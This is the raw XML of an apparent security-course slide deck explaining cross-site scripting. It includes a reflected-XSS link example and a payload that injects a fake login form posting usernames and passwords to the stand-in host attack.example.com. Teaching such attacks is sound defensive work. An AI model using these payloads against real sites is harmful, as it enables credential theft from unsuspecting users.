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2"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId13"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256"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846" autoAdjust="0"/>
    <p:restoredTop sz="94663" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="105" d="100"/>
          <a:sy n="105" d="100"/>
        </p:scale>
        <p:origin x="208" y="6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7/31/22</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7/31/22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marL="228600" indent="-228600">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="2400" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica LT Std" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="725070" indent="-342900">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
              <a:def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spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica LT Std" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to 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
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Box 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9D268EC-7B53-4A79-B58A-882FA941BE22}"/>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E1C3BA65-6189-449B-9011-BE61FC52307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FE8E16FE-4666-4DD6-99D5-EE7B81531C39}"/>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dirty="0"/>
              <a:t>XSS</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a:t>Date</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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246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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What is Cross-Site Scripting (XSS) – CAPEC-63</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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>An adversary embeds malicious scripts in content that will be served to web browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The goal of the attack is for the client-side browser to execute the script with the users' privilege level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>An attack of this type exploits a programs' vulnerabilities that are brought on by allowing remote hosts to execute code and scripts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517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4A58-9283-E1C6-39FB-AD8E7F37118F}"/>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Simplistic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Well-Known Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D6A4499-905F-63DA-BCB4-4CFA455BE741}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1751972063"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="812801" y="1442609"/>
          <a:ext cx="10972800" cy="2289460"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="10972800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4106062291"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="2008105">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Classic phishing attacks lure users to click on content that appears trustworthy, such as logos, and links that seem to go to their trusted financial institutions and online auction sites. But instead, the attacker appends malicious scripts into the otherwise innocent appearing resources. The HTML source for a standard phishing attack looks like this:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="t"/>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="AA0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>&lt;a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="AA0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>href</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="AA0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>="</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="AA0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>www.exampletrustedsite.com?Name</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="AA0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>=&lt;script&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="AA0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>maliciousscript</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="AA0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>&lt;/script&gt;"&gt;Trusted Site&lt;/a&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="t"/>
                      <a:endParaRPr lang="en-US" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="AA0000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>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When the user clicks the link, the appended script also executes on the local user's machine.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="47450" marT="47450" marB="47450">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="992713606"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F5F0535-2ADD-883F-3FE8-0AB92C737AB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
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D956713-8784-11F2-44E9-EF46478AC3D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="749808" y="3959620"/>
            <a:ext cx="10875264" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"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This results in a harmless alert dialog popping up. Initially this might not appear to be much of a vulnerability. After all, why would someone enter a URL that causes malicious code to run on their own computer? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1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r>
              <a:rPr lang="en-US"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real danger is that an attacker will create the malicious URL, then use e-mail or social engineering tricks to lure victims into visiting a link to the URL. When victims click the link, they unwittingly reflect the malicious content through the vulnerable web application back to their own computers.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68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C82C-040D-8607-F295-2E4456373935}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A More Real Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07C3AFB8-B0DA-1BCE-BBD2-27E223F95174}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="1267968"/>
            <a:ext cx="10972800" cy="4769579"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>More realistically, the attacker can embed a fake login box on the page, tricking the user into sending the user's password to the attacker:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If a user clicks on this link then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Welcome.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> will generate the following HTML and send it to the user's browser:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F82D687-44A6-E4A6-F94F-AB2D67A6B5B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
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BAE2518-EB7D-DF85-0A16-058DE614C217}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1914144" y="2170177"/>
            <a:ext cx="8227384" cy="1225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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>trustedSite.example.com</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>welcome.php?username</a:t>
            </a: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=&lt;div id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stealPassword</a:t>
            </a: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"&gt;Please Login:&lt;form name="input" action="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>attack.example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stealPassword.php</a:t>
            </a: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 method="post"&gt;Username: &lt;input type="text" name="username" /&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>br</a:t>
            </a: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/&gt;Password: &lt;input type="password" name="password" /&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>br</a:t>
            </a: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/&gt;&lt;input type="submit" value="Login" /&gt;&lt;/form&gt;&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09E9D4A7-AF0A-FB80-E9AC-571AF3B46D50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1914144" y="4425696"/>
            <a:ext cx="7668768" cy="1881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&lt;div class="header"&gt; Welcome, &lt;div id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stealPassword</a:t>
            </a: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"&gt; Please Login:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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&lt;form name="input" action="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>attack.example.com</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stealPassword.php</a:t>
            </a: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 method="post"&gt;Username: &lt;input type="text" name="username" /&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>br</a:t>
            </a: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/&gt;</a:t>
            </a:r>
            <a:b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b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Password: &lt;input type="password" name="password" /&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>br</a:t>
            </a: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/&gt;</a:t>
            </a:r>
            <a:b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b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&lt;input type="submit" value="Login" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>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&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:b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br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/div&gt;&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="234482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95CC-51C5-90B4-6228-45897BD999DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Types of XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3765F117-C754-A6EA-A87F-A80CB0CBB669}"/>
              </a:ext>
            </a:extLst>
